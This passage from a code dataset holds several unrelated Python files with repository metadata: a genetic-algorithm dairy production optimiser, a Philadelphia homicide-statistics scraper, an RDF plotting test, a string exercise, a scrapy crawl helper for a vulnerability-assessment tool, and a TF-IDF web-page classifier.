self.np_selected_products[pos] > 0:\n column_product.append( self.np_products_list[pos] )\n column_qtd.append( self.np_selected_products[pos] )\n column_milk.append( self.np_milk_list[pos] )\n acum_milk += self.np_milk_list[pos]\n column_hour.append( self.np_hours_list[pos] )\n acum_hours += self.np_hours_list[pos]\n column_profit.append( self.np_profit_list[pos] )\n acum_profit += self.np_profit_list[pos]\n\n column_product.append( \"\" )\n column_qtd.append( \"\" )\n column_milk.append( acum_milk )\n column_hour.append( acum_hours )\n column_profit.append( acum_profit )\n\n response[column_product_name] = column_product\n response[column_qtd_name] = column_qtd\n response[column_milk_name] = column_milk\n response[column_hour_name] = column_hour\n response[column_profit_name] = column_profit\n \n pd_response = pd.DataFrame( data = response )\n return pd_response\n\n\n def __init__( self, pd_resources ):\n if pd_resources is None:\n raise ValueError\n\n products_List = []\n milk_list = []\n hours_list = []\n profit_list = []\n\n try:\n for index in pd_resources.itertuples():\n if index[1][0:1].lower() != \"#\":\n # 0 1 2 3\n # Product, milk, hour, profit\n products_List.append(index[1])\n milk_list.append(int(index[2]))\n hours_list.append(int(index[3]))\n profit_list.append(int(index[4]))\n\n self.np_products_list = np.array(products_List)\n self.np_milk_list = np.array(milk_list)\n self.np_hours_list = np.array(hours_list)\n self.np_profit_list = np.array(profit_list)\n\n except Exception as inst:\n print(inst)\n print(\"File load failure!\")\n raise ValueError\n \n\ndef stop_search( hour_limit, hour_tolerance, milk_limit, milk_tolerance, population, best_fit_array, medium_fit_array, generation, resources ):\n if hour_limit <= 0:\n raise ValueError\n if hour_tolerance <= 0:\n raise ValueError\n if milk_limit <= 0:\n raise ValueError\n if milk_tolerance <= 0:\n raise ValueError\n if population is None:\n raise ValueError\n if best_fit_array is None:\n raise ValueError\n if medium_fit_array is None:\n raise ValueError\n if generation <= 0:\n raise ValueError\n if resources is None:\n raise ValueError\n\n if generation == 0:\n return False\n\n ret = False\n\n best_fitness = 0\n best_hour = 0\n best_milk = 0\n\n medium_fitness = 0\n medium_hour = 0\n medium_milk = 0\n\n fitness_amount = 0\n hour_amount = 0\n milk_amount = 0\n\n #Calcula fitness medio da populacao e guarda o fitness do melhor candidato\n pop_sorted_by_fitness = sorted( population, key = Candidate.get_fitness, reverse = True)\n best_candidate = pop_sorted_by_fitness[0]\n best_fitness = best_candidate.fitness\n best_hour = best_candidate.hour\n best_milk = best_candidate.milk\n\n for cand in pop_sorted_by_fitness:\n fitness_amount += cand.fitness\n hour_amount += cand.hour\n milk_amount += cand.milk\n \n #Precisa pular a primeira geracao porque ainda nao foi filtrada\n if generation > 1:\n\n if cand.fitness >= best_fitness:\n best_candidate = cand\n \n best_fitness = cand.fitness\n best_hour = cand.hour\n best_milk = cand.milk\n \n if( best_hour <= hour_limit and (hour_limit - best_hour) <= hour_tolerance and\n best_milk <= milk_limit and (milk_limit - best_milk) <= milk_tolerance ):\n ret = True\n resources.set_selected_products( cand )\n #Mostra dados do melhor candidato\n print(\"\")\n print( \"fitness: {0} , hour: {1} , milk: {2} , profit: {3} , DNA: {4}\".format(best_candidate.fitness, best_candidate.hour, best_candidate.milk, best_candidate.profit, best_candidate.np_dna ))\n \n print( \"Hour : {0}\".format( 
resources.np_hours_list ))\n print( \"Milk : {0}\".format( resources.np_milk_list ))\n print( \"Profit: {0}\".format( resources.np_profit_list ))\n return True\n\n if generation > 30 and best_fitness == 0: #Nao houve melhoria nesta geracao entao repete o melhor colocado \n best_fitness = best_fit_array[generation - 2]\n\n medium_hour = hour_amount / len( population )\n medium_milk = milk_amount / len( population )\n medium_fitness = fitness_amount / len( population )\n\n #Registra resultados \n best_fit_array.append( best_fitness )\n medium_fit_array.append( medium_fitness )\n\n #Verifica se houve alguma alteracao nas 5 ultimas geracoes\n if generation > 30:\n if best_candidate.hour <= hour_limit and best_candidate.milk <= milk_limit:\n if best_fit_array[generation - 2] == best_fit_array[generation - 3]:\n if best_fit_array[generation - 3] == best_fit_array[generation - 4]:\n if best_fit_array[generation - 4] == best_fit_array[generation - 5]:\n ret = True\n resources.set_selected_products( best_candidate )\n #Mostra dados do melhor candidato\n print(\"\")\n print( \"fitness: {0} , hour: {1} , milk: {2} , profit: {3} , DNA: {4}\".format(best_candidate.fitness, best_candidate.hour, best_candidate.milk, best_candidate.profit, best_candidate.np_dna ))\n \n print( \"Hour : {0}\".format( resources.np_hours_list ))\n print( \"Milk : {0}\".format( resources.np_milk_list ))\n print( \"Profit: {0}\".format( resources.np_profit_list ))\n\n #Mostra resultados\n print(\"Generation: {0} - Fitness [hour / milk] best: {1} [{2} / {3}] - Fitness [hour / milk] medium: {4} [{5} / {6}]\".format(generation, best_fitness, best_hour, best_milk, medium_fitness, medium_hour, medium_milk))\n \n return ret\n\n\n\n\ndef search( hour_tolerance, hour_limit, milk_tolerance, milk_limit, resources ):\n if hour_tolerance <= 0:\n raise ValueError\n if hour_limit <= 0:\n raise ValueError\n if milk_tolerance <= 0:\n raise ValueError\n if milk_limit <= 0:\n raise ValueError\n if resources is None:\n raise ValueError\n\n ini_pop_qt = 200 #Usar 1000\n intermed_pop_qt = 2000 #usar 10000\n #mutation_rate = 0.2 #Testando com 80%\n crossover_rate = 0.8 #Testando com 20%\n\n if len(resources.np_products_list) < 2:\n print(\"\\nProducts not found. 
Using random option\")\n available_products_qt = int(float(input(\"\\nProducts amunt to create (limit: 1010): \")))\n else:\n available_products_qt = len(resources.np_products_list) - 1\n\n if available_products_qt <= 0:\n print(\"\\nProduct amount limit should be higher than zero!\\n\")\n exit()\n \n if available_products_qt > 1010:\n print(\"Amounts higher than 1010 are forbiden!\")\n exit()\n\n if available_products_qt <= 15:\n print(\"There are \" + str(2 ** available_products_qt) + \" possible solutions for this products amount\")\n else:\n possible_solutions = 2 ** available_products_qt\n search_years = possible_solutions / (3600 * 24 * 365 * 1000000)\n print(\"There are {0:+5.2E} possible solutions for this products amount\".format(possible_solutions))\n if available_products_qt > 44:\n print(\"\\nIf we had a computer capable of processing 1.000.000 candidates each second\")\n print(\"and considering that one year has (60s * 60m * 24h * 365d) 31.536.000 seconds\")\n print(\"it would take {0:+5.2e} years to find the best solution.\".format(search_years))\n print(\"Therefore, we'll search for just a good solution, not for the best one.\")\n print(\"The good solution will be the candidate with the best profit within the limit of available hours and milk in a week \\n\")\n\n populat = create_initial_population( ini_pop_qt, milk_limit, hour_limit, resources )\n population = sorted( populat, key = Candidate.get_profit, reverse = True )\n\n #print(\"Show the initical population: \")\n #for pos in range(0, len(population)):\n # print(\"hour: {0} , profit: {1} , DNA: {2}\".format(population[pos].hour, population[pos].profit, population[pos].np_dna))\n \n generation = 1\n xItera = [1]\n best_fit_array = []\n medium_fit_array = []\n\n #Repete este ciclo ate condicao de parada\n while not stop_search( hour_limit, hour_tolerance, milk_limit, milk_tolerance, population, best_fit_array, medium_fit_array, generation, resources ):\n #Cria nova populacao intermediaria com mutacao e crossover\n #Para manter a diversidade genetica a semente para a proxima geracao sera formada por 40% dos melhores candidatos atuais e 10% dos piores\n \n #==>Seleciona os pais para reproducao\n best_cand_qt = int(30 * ini_pop_qt / 100)\n worst_cand_qt = int(20 * ini_pop_qt / 100)\n cand_for_reproduction_1 = np.copy(population[:best_cand_qt])\n cand_for_reproduction_2 = np.copy(population[ini_pop_qt - worst_cand_qt:])\n cand_for_reproduction = np.append(cand_for_reproduction_1, cand_for_reproduction_2)\n \n #==>Reproducao por CROSSOVER\n crossover_qt = int(crossover_rate * (intermed_pop_qt - len(cand_for_reproduction)))\n if (crossover_qt % 2) != 0:\n crossover_qt = crossover_qt + 1\n\n intermed_pop_crossover = apply_crossover(crossover_qt, cand_for_reproduction, milk_limit, hour_limit, resources)\n \n #==>Reproducao por MUTACAO\n mutation_qt = intermed_pop_qt - len(cand_for_reproduction) - crossover_qt\n \n #==>Selecao da proxima geracao de candidatos\n intermed_pop_mutation = apply_mutation(mutation_qt, cand_for_reproduction, milk_limit, hour_limit, resources)\n \n intermed_pop = np.append(cand_for_reproduction, intermed_pop_crossover)\n intermed_pop = np.append(intermed_pop, intermed_pop_mutation)\n #print(\"Size of intermed pop: {0}\".format(len(intermed_pop)))\n\n population = apply_selection(ini_pop_qt, hour_limit, milk_limit, intermed_pop)\n\n #Registra parte dos resultados\n generation = generation + 1\n xItera.append(generation)\n\n \n\n\ndef apply_selection(pop_qt, hour_limit, milk_limit, pop_inter):\n if pop_qt 
<= 0:\n raise ValueError\n if hour_limit <= 0:\n raise ValueError\n if milk_limit <= 0:\n raise ValueError\n if pop_inter is None:\n raise ValueError\n \n #Fase 1: elimina candidatos acima do limite de hora ate limite da quantidade desejada para a populacao\n #Ordena populacao intermediaria em ordem decrescente usando o limite de hora\n #Remove todos acima do limite de hora ou ate que sobre somente qtd_pop\n pop_sorted_by_hour = sorted( pop_inter, key = Candidate.get_hour, reverse = True)\n dismissed = True\n while len(pop_sorted_by_hour) > pop_qt and dismissed == True:\n pop_sorted_by_hour = np.delete(pop_sorted_by_hour, 0)\n cand = pop_sorted_by_hour[0]\n if cand.hour > hour_limit:\n dismissed = True\n else:\n dismissed = False\n\n #Fase 2: elimina candidatos acima do limite de leite ate limite da quantidade desejada para a populacao\n #Ordena populacao intermediaria em ordem decrescente usando o limite de leite\n #Remove todos acima do limite de leite ou ate que sobre somente qtd_pop\n pop_sorted_by_milk = sorted( pop_sorted_by_hour, key = Candidate.get_milk, reverse = True)\n dismissed = True\n while len(pop_sorted_by_milk) > pop_qt and dismissed == True:\n pop_sorted_by_milk = np.delete(pop_sorted_by_milk, 0)\n cand = pop_sorted_by_milk[0]\n if cand.milk > milk_limit:\n dismissed = True\n else:\n dismissed = False\n\n #Fase 3: elimina candidatos ate o limite da quantidade desejada para a populacao\n pop_sorted_by_fitness = sorted( pop_sorted_by_milk, key = Candidate.get_fitness, reverse = True)\n pop_sorted_by_fitness_sharp = pop_sorted_by_fitness[0:pop_qt]\n \n return pop_sorted_by_fitness_sharp\n\n\n\ndef apply_crossover(crossover_qt, cand_to_repro, milk_limit, hour_limit, prod_list):\n if crossover_qt <= 0:\n raise ValueError\n if cand_to_repro is None:\n raise ValueError\n if milk_limit <= 0:\n raise ValueError\n if hour_limit <= 0:\n raise ValueError\n if prod_list is None:\n raise ValueError\n\n #A crossover_qt indica a quantidade de descendentes a ser produzida\n #Em cada ciclo sao criados dois novos descendentes\n #Entao serao realizados \"crossover_qt/2\" ciclos\n #Em cada ciclo:\n #Seleciona 2 pais da lista de candidatos a reproducao, p1 e p2\n #Seleciona ponto de crossover\n #Cria dois novos candidatos, f1 e f2\n #Copia DNA de p1 ate o ponto de crossover para o inicio de f1\n #Copia DNA de p1 apos o ponto de crossover para o fim de f2\n #Copia DNA de p2 ate o ponto de crossover para o inicio de f2\n #Copia DNA de p2 apos o ponto de crossover para o fim de f1\n #Acrescenta novos filhos na lista parcial de candidatos\n #Devolve a lista parcial criada\n \n new_pop_crossover = []\n np_new_pop_crossover = np.array(new_pop_crossover)\n\n qtd_cicles = int(crossover_qt / 2)\n for pos in range(0, qtd_cicles):\n choice_limit = len(cand_to_repro) - 2\n posic_cand1 = randint(1, choice_limit)\n p1 = cand_to_repro[posic_cand1] #Seleciona p1\n #Obs.: p2 deve ser diferente de p1 para evitar perda de diversidade genetica\n posic_cand2 = randint(1, choice_limit)\n while posic_cand1 == posic_cand2: \n posic_cand2 = randint(1, choice_limit)\n p2 = cand_to_repro[posic_cand2] #Seleciona p2\n\n# #Mostra DNA dos pais\n# print(\"[Father 1]hour: {0} profit: {1} DNA: {2}\".format(p1.hour, p1.profit, p1.np_dna))\n# print(\"[Father 2]hour: {0} profit: {1} DNA: {2}\".format(p2.hour, p2.profit, p2.np_dna))\n\n dna_length = len(p1.np_dna)\n choice_limit = dna_length - 2 #Todos os DNAs tem o mesmo tamanho e quero excluir os extremos\n pto_cross = randint(1, choice_limit) \n \n f1 = Candidate(milk_limit, 
hour_limit, prod_list) #DNA ja foi criado mas sera alterado por crossover\n f2 = Candidate(milk_limit, hour_limit, prod_list) #DNA tambem sera alterado\n \n #Copia parte de p1 para f1 e parte de f2 para p2\n for pos in range(0, pto_cross): #Adorei esse foreach() esquisitao\n f1.np_dna[pos] = p1.np_dna[pos]\n f2.np_dna[pos] = p2.np_dna[pos]\n \n #Copia parte de p1 para f2 e parte de p2 para f1 \n for pos in range(pto_cross, dna_length):\n f1.np_dna[pos] = p2.np_dna[pos]\n f2.np_dna[pos] = p1.np_dna[pos]\n \n #Ajusta fitness dos novos candidatos\n f1.fitness_evaluation( milk_limit, hour_limit, prod_list )\n f2.fitness_evaluation( milk_limit, hour_limit, prod_list ) \n \n #Acrescenta novos candidatos na lista parcial \n np_new_pop_crossover = np.append(np_new_pop_crossover, f1)\n np_new_pop_crossover = np.append(np_new_pop_crossover, f2)\n\n# #Mostra DNA dos filhos\n# print(\"Ponto de crossover: \" + str(pto_cross))\n# print(\"[Son 1]hour: {0} profit: {1} DNA: {2}\".format(f1.hour, f1.profit, f1.np_dna))\n# print(\"[Son 2]hour: {0} profit: {1} DNA: {2}\".format(f2.hour, f2.profit, f2.np_dna))\n\n return np_new_pop_crossover\n\n\ndef apply_mutation(wished_qt, cand_to_repro, milk_limit, hour_limit, prod_list):\n if wished_qt <= 0:\n raise ValueError\n if cand_to_repro is None:\n raise ValueError\n if milk_limit <= 0:\n raise ValueError\n if hour_limit <= 0:\n raise ValueError\n if prod_list is None:\n raise ValueError\n\n #Cada candidato tem seu vetor de zeros e uns ( DNA[] )\n #Cada candidato selecionado gera um clone\n #Aplica mutacao no novo candidato\n \n new_pop_mutation = []\n np_new_pop_mutation = np.array( new_pop_mutation )\n\n for pos in range( 0, wished_qt ):\n #Seleciona aleatoriamente um membro do grupo de candidatos a reproducao\n new_cand = Candidate( milk_limit, hour_limit, prod_list ) #Este novo candidato vai receber o DNA alterado por mutacao\n choice_limit = len( cand_to_repro ) - 1\n cand_position = randint( 0, choice_limit )\n cand = cand_to_repro[cand_position]\n new_cand.np_dna = np.copy( cand.np_dna )\n\n #Aplica mutacao em um ponto de seu DNA\n mutation_limit = len( new_cand.np_dna ) - 1\n mutation_target = randint( 0, mutation_limit )\n if new_cand.np_dna[mutation_target] == 0: \n new_cand.np_dna[mutation_target] = 1\n else:\n new_cand.np_dna[mutation_target] = 0\n \n new_cand.fitness_evaluation( milk_limit, hour_limit, prod_list )\n\n# #Mostra DNA do pai\n# print(\"[Father]hour: {0} profit: {1} DNA: {2}\".format(cand.hour, cand.profit, cand.np_dna))\n# #Mostra DNA dos pais\n# print(\"[Son]hour: {0} profit: {1} DNA: {2}\".format(new_cand.hour, new_cand.profit, new_cand.np_dna))\n \n #Insere novo candidato na populacao intermediaria\n np_new_pop_mutation = np.append( np_new_pop_mutation, new_cand )\n \n return np_new_pop_mutation\n \n\n\ndef create_initial_population( init_pop_qt, milk_limit, hour_limit, prod_list ):\n if init_pop_qt <= 0:\n raise ValueError\n if milk_limit <= 0:\n raise ValueError\n if hour_limit <= 0:\n raise ValueError\n if prod_list is None:\n raise ValueError\n \n pop = []\n for pos in range( 0, init_pop_qt ):\n cand = Candidate( milk_limit, hour_limit, prod_list )\n pop.append( cand )\n return pop\n \n\n\n\nif __name__ == '__main__':\n hour_tolerance = 2\n milk_tolerance = 50\n resources_file_name = \"\"\n\n print(\"\\n###################################################################\")\n print(\"# #\")\n print(\"# Dairy cooperative problem #\")\n print(\"# #\")\n 
print(\"###################################################################\")\n\n\n resources_file_name = input(\"\\nDairy parameters file name: \")\n if resources_file_name == \"\":\n print(\"\\nParameters file missing\\n\")\n exit()\n\n try:\n pd_resources = pd.read_csv( resources_file_name )\n resources = ProductsList( pd_resources )\n except:\n print(\"\\nParameters load failure\\n\")\n exit()\n\n try:\n hour_limit = int(float(input(\"\\nWeek hour limit: \")))\n if hour_limit <= 0:\n print(\"\\nWeek hour limit must be higher than zero!\\n\")\n exit()\n except:\n raise ValueError\n\n try:\n milk_limit = int(float(input(\"\\nWeek milk limit: \")))\n if milk_limit <= 0:\n print(\"\\nWeek milk limit must be higher than zero!\\n\")\n exit() \n except:\n raise ValueError\n\n\n exec_init = time.time() \n\n search( hour_tolerance, hour_limit, milk_tolerance, milk_limit, resources )\n \n print( resources.get_selected_products())\n\n exec_end = time.time()\n diff = exec_end - exec_init\t\n hours, r = divmod(diff, 3600)\n minutes, seconds = divmod(r, 60)\n print(\"\\nElapsed time: {hours:0>2}:{minutes:0>2}:{seconds:05.3f}\".format(hours=int(hours), minutes=int(minutes), seconds=seconds))\n ","repo_name":"platiagro/GA","sub_path":"dairy_cooperative/dairy_cooperative/cooperative_ga_CSV.py","file_name":"cooperative_ga_CSV.py","file_ext":"py","file_size_in_byte":23119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20972858721","text":"\"\"\"Scrape the total homicide count from the Philadelphia Police Department's \nCrime Stats website.\"\"\"\n\nfrom dataclasses import dataclass\nfrom datetime import date\n\nimport cloudscraper\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom cached_property import cached_property\nfrom loguru import logger\n\nfrom . import DATA_DIR\n\n\n@dataclass\nclass PPDHomicideTotal:\n \"\"\"Total number of homicides scraped from the Philadelphia Police\n Department's website.\n\n This provides:\n - Annual totals since 2007 for past years.\n - Year-to-date homicide total for the current year.\n\n Source\n ------\n https://www.phillypolice.com/crime-maps-stats/\n \"\"\"\n\n debug: bool = False\n\n URL = \"https://www.phillypolice.com/crime-maps-stats/\"\n\n def __post_init__(self):\n scraper = cloudscraper.create_scraper()\n self.soup = BeautifulSoup(scraper.get(self.URL).content, \"lxml\")\n\n @cached_property\n def years(self):\n \"\"\"The years available on the page. 
Starts with 2007.\"\"\"\n\n return [\n int(td.text)\n for td in self.soup.select(\"#homicide-stats\")[0]\n .find(\"tr\")\n .find_all(\"th\")[1:]\n ]\n\n @cached_property\n def as_of_date(self):\n \"\"\"The current \"as of\" date on the page.\"\"\"\n\n date = (\n self.soup.select(\"#homicide-stats\")[0]\n .select(\"tbody\")[0]\n .select_one(\"td\")\n .text.split(\"\\n\")[0]\n )\n return pd.to_datetime(date + \" 11:59:00\")\n\n @cached_property\n def annual_totals(self):\n \"\"\"The annual totals for homicides in Philadelphia.\"\"\"\n\n # This is for historic data only (doesn't include current year)\n annual_totals = [\n int(td.text)\n for td in self.soup.select(\"#homicide-stats\")[1].find_all(\"td\")[1:]\n ]\n\n if len(annual_totals) != len(self.years[1:]):\n raise ValueError(\n \"Length mismatch between parsed years and annual homicide totals\"\n )\n\n return pd.DataFrame(\n {\"year\": self.years[1:], \"annual\": annual_totals}\n ).sort_values(\"year\", ascending=False)\n\n @cached_property\n def ytd_totals(self):\n \"\"\"The year-to-date totals for homicides in Philadelphia.\"\"\"\n\n # Scrape the table\n table = self.soup.select(\"#homicide-stats\")[0]\n ytd_totals = [table.select(\"tbody\")[0].select(\".homicides-count\")[0].text]\n ytd_totals += [td.text for td in table.select(\"tbody\")[0].find_all(\"td\")[2:-1]]\n ytd_totals = list(map(int, ytd_totals))\n\n if len(ytd_totals) != len(self.years):\n raise ValueError(\"Length mismatch between parsed years and homicides\")\n\n # Return ytd totals, sorted in ascending order\n out = pd.DataFrame({\"year\": self.years, \"ytd\": ytd_totals})\n return out.sort_values(\"year\", ascending=False)\n\n @property\n def path(self):\n return DATA_DIR / \"raw\" / \"homicide_totals_daily.csv\"\n\n def get(self):\n \"\"\"Get the shooting victims data, either loading\n the currently downloaded version or a fresh copy.\"\"\"\n\n # Load the database of daily totals\n df = pd.read_csv(self.path, parse_dates=[0])\n\n # Make sure it's in ascending order by date\n return df.sort_values(\"date\", ascending=True)\n\n def _get_years_from_year_end_section(self):\n return [\n int(th.text)\n for th in self.soup.select(\"#homicide-stats\")[1]\n .select_one(\"tr\")\n .select(\"th\")[1:]\n ]\n\n def update(self, force=False):\n \"\"\"Update the local data via scraping the PPD website.\"\"\"\n\n # Check for new year's\n year_end_years = self._get_years_from_year_end_section()\n max_year_end_year = max(year_end_years)\n\n thisYear = date.today().year\n if thisYear != max_year_end_year + 1:\n raise ValueError(\n f\"It seems like we are in a new year {thisYear} but the homicide page hasn't been updated yet\"\n )\n\n # Load the database\n database = self.get()\n\n # Latest database date\n latest_database_date = database.iloc[-1][\"date\"]\n\n # Update if we need to\n if force or latest_database_date < self.as_of_date:\n\n if self.debug:\n logger.debug(\"Parsing PPD website to update YTD homicides\")\n\n # Merge annual totals (historic) and YTD (current year)\n data = pd.merge(self.annual_totals, self.ytd_totals, on=\"year\", how=\"outer\")\n\n # Add new row to database\n YTD = self.ytd_totals.iloc[0][\"ytd\"]\n database.loc[len(database)] = [self.as_of_date, YTD]\n\n # Sanity check on new total\n new_homicide_total = database.iloc[-1][\"total\"]\n old_homicide_total = database.iloc[-2][\"total\"]\n new_year = database.iloc[-1][\"date\"].year\n old_year = database.iloc[-2][\"date\"].year\n if (\n not force\n and new_homicide_total < old_homicide_total\n and (new_year == 
old_year)\n ):\n raise ValueError(\n f\"New YTD homicide total ({new_homicide_total}) is less than previous YTD total ({old_homicide_total})\"\n )\n\n # Save it\n path = DATA_DIR / \"processed\" / \"homicide_totals.json\"\n data.set_index(\"year\").to_json(path, orient=\"index\")\n\n # Save it\n if self.debug:\n logger.debug(\"Updating PPD homicides data file\")\n\n # Drop duplicates and save\n database.drop_duplicates(subset=[\"date\"], keep=\"last\").to_csv(\n self.path, index=False\n )\n","repo_name":"PhilaController/gun-violence-dashboard-data","sub_path":"gun_violence_dashboard_data/homicides.py","file_name":"homicides.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"34140736761","text":"\"\"\"\nThis file exists to test all the g(r) results against those \ndetermined with VMD.\n\"\"\"\n\nimport patchyAnalysisTools.trajectory as trj\nimport matplotlib.pyplot as plt\nimport pdb\nimport numpy as np\n\n# load trajectory\ntraj = trj.trajectory(file_name=\"final.conf\")\n\n# get the last frame\nlast_frame = traj.get_last_frame()\n\n# get g(r)\nr,gr = last_frame.calculate_rdf()\n\n# get g_00(r)\nr,gr_00 = last_frame.calculate_rdf(selection=(0,0))\n\n# get g_11(r)\nr,gr_11 = last_frame.calculate_rdf(selection=(1,1))\n\n# get g_01(r)\nr,gr_01 = last_frame.calculate_rdf(selection=(0,1))\n\n# get g_10(r)\nr,gr_10 = last_frame.calculate_rdf(selection=(1,0))\n\n# load VMD data\ndata0 = np.loadtxt('g00.dat')\ndata1 = np.loadtxt('g11.dat')\ndata01 = np.loadtxt('g01.dat')\n\n# plot\nplt.plot(r,gr,label=\"g(r)\")\nplt.plot(r,gr_00,label=\"g_00\")\nplt.plot(data0[:,0],data0[:,1],label=\"g_00 from vmd\")\nplt.plot(data1[:,0],data1[:,1],label=\"g_11 from vmd\")\nplt.plot(data01[:,0],data01[:,1],label='g_01 from vmd')\nplt.plot(r,gr_11,label=\"g_11\")\nplt.plot(r,gr_01,label=\"g_01\")\nplt.plot(r,gr_10,label=\"g_10\")\nplt.legend()\nplt.yscale('log')\nplt.show()","repo_name":"sodiumnitrate/patchyAnalysisTools","sub_path":"examples/g_ab_test/test_gr.py","file_name":"test_gr.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"18303283751","text":"'''\ngiven a string s, return a string that contains no sequences of 3 consecutive\nidentical letters by removing the minimum number of consec letters.\n\nexamples:\needaaad => eedaad, remove an 'a'\nabbbcccdd => abbccdd\n\neeeeeee => ee\n\nefffeee => effee\n\n\napproach:\nsimilar to longest semi alternating string. keep a count variable that\nkeeps track of how many times we've seen s[i] == s[i-1], don't append the current\nchar to the result if the count >= 2. 
once we see s[i] != s[i-1], reset count\n'''\n\n\ndef string_without_3_consec(s):\n if not s or len(s) == 1:\n return s\n count = 0\n result = [s[0]]\n for i in range(1, len(s)):\n if s[i] == s[i-1]:\n count+=1\n else:\n count=0\n if count >= 2:\n continue\n else:\n result.append(s[i])\n return \"\".join(result)\n\ndatas = [\n (\"eedaaad\", \"eedaad\"),\n (\"abbbcccdd\", \"abbccdd\"),\n (\"eeeee\", \"ee\"),\n (\"abcabcccdc\", \"abcabccdc\"),\n (\"eeeeeedddddffddddee\", \"eeddffddee\"),\n (\"uuuuxaaaaxuuu\", \"uuxaaxuu\")\n]\n\nfor data in datas:\n try:\n assert(string_without_3_consec(data[0]) == data[1])\n print(f\"assertion succeeded for {data[0]} == {data[1]}\")\n except AssertionError:\n print(f\"assertion failed for for {data[0]} == {data[1]}\")\n\n\n","repo_name":"ivanwakeup/algorithms","sub_path":"algorithms/prep/microsoft/string_without_3_consec.py","file_name":"string_without_3_consec.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"19137851012","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis modules serves as a helper for the AVAIN crawler. It runs a simple scrapy spider\nthat crawls URLs, sends the responses to the AVAIN crawler that processes them and sends\nback new URLs to crawl.\n\"\"\"\n\nimport socket\nimport sys\nfrom scrapy.crawler import CrawlerProcess\nfrom scrapy.spiders import CrawlSpider\nfrom scrapy.spidermiddlewares.httperror import HttpError\nfrom scrapy.http import Request\n\nimport ipc_operations\n\nUNIX_SOCK_ADDR = \"./crawler_socket\"\nRECV_BUFFER_SIZE = 4096\nALLOWED_DOMAINS = []\n\n\nclass AvainCrawlSpider(CrawlSpider):\n name = \"avain_crawl_spider\"\n\n def __init__(self, cookies, **kwargs):\n super().__init__(**kwargs)\n self.cookies = cookies\n\n def parse(self, response):\n \"\"\" Parse the response by sending it to the AVAIN crawler module \"\"\"\n response.request.callback = None # needed for pickling\n response.request.errback = None # needed for pickling\n\n ipc_operations.send_object(SOCK, response) # send the response object\n yield_urls = ipc_operations.receive_object(SOCK) # receive new URLs to crawl\n\n # prepare and yield a request for every new URL\n for url in yield_urls:\n req = self.get_request(url)\n yield req\n\n def on_error(self, failure):\n \"\"\" Overrides the default method to catch and process e.g. 
status 500 responses \"\"\"\n\n if isinstance(failure.value, HttpError):\n response = failure.value.response\n return self.parse(response)\n return None\n\n def make_requests_from_url(self, url):\n \"\"\" Overrides the default method to catch by default discarded HTTP responses \"\"\"\n\n return self.get_request(url)\n\n def get_request(self, url):\n \"\"\" Prepare a request with proper configuration and configured cookies \"\"\"\n\n req = Request(url, callback=self.parse, dont_filter=True, errback=self.on_error,\n meta={'dont_redirect': True, 'handle_httpstatus_list': [301, 302, 401, 403, 405]})\n for key, val in self.cookies.items():\n req.cookies[key] = val\n return req\n\n\nif __name__ == \"__main__\":\n # create the IPC socket\n SOCK = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n try:\n SOCK.connect(UNIX_SOCK_ADDR)\n except socket.error as msg:\n sys.stderr.write(msg)\n sys.exit(1)\n\n # receive initial information\n init_dict = ipc_operations.receive_object(SOCK)\n # logging.getLogger(\"scrapy\").propagate = False\n\n # start crawling\n process = CrawlerProcess({\n \"USER_AGENT\": init_dict[\"user_agent\"]\n })\n process.crawl(AvainCrawlSpider, allowed_domains=init_dict[\"allowed_domains\"],\n start_urls=init_dict[\"start_urls\"], cookies=init_dict[\"cookies\"])\n process.start()\n\n # shutdown and close connection when finished\n SOCK.shutdown(socket.SHUT_RDWR)\n SOCK.close()\n","repo_name":"ra1nb0rn/avain","sub_path":"modules/web/crawler/crawl_helper.py","file_name":"crawl_helper.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"76"} +{"seq_id":"23000556441","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier\nimport os\nimport numpy as np\nfrom nltk.corpus import stopwords\n\n\nlabel_fn = []\nfor root, subdirs, files in os.walk('data'):\n if root != 'data':\n label = root.split('/')[-1]\n for fn in files:\n label_fn.append((label, root + '/' + fn))\n\nlabels = [t[0] for t in label_fn]\nfilenames = [t[1] for t in label_fn]\n\ntf = TfidfVectorizer(input='filename', stop_words=stopwords.words('english'),\n decode_error='ignore', max_df=0.95, min_df=0.05)\nX = tf.fit_transform(filenames).todense()\nprint('Vectorization Done')\nprint('Number of features = %d' % X.shape[1])\n\nle = LabelEncoder()\n\ny_str = labels\ny = le.fit_transform(y_str)\nprint('Label Encoding Done')\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=13)\n\nclf = SVC(C=1000.0)\n# or RandonForestClassifier()\n# or GradientBoostingClassifier()\nclf.fit(X_train, y_train)\nprint('Learning Complete')\n\ny_pred = clf.predict(X_test)\nprint('Testing Samples = %d' % len(y_test))\nprint('Correctly classified Samples = %d' % np.sum(y_pred == y_test))\nprint('Percentage Classified Correctly = %f' % (np.sum(y_pred == y_test)*100.0/len(y_test)))\n\n #exit(0)\n #if root != 'data':\n # exit(0)","repo_name":"vighneshbirodkar/web","sub_path":"webc.py","file_name":"webc.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5453947439","text":"from __future__ import absolute_import\nfrom contextlib import contextmanager\nfrom node.events import NodeAddedEvent\nfrom 
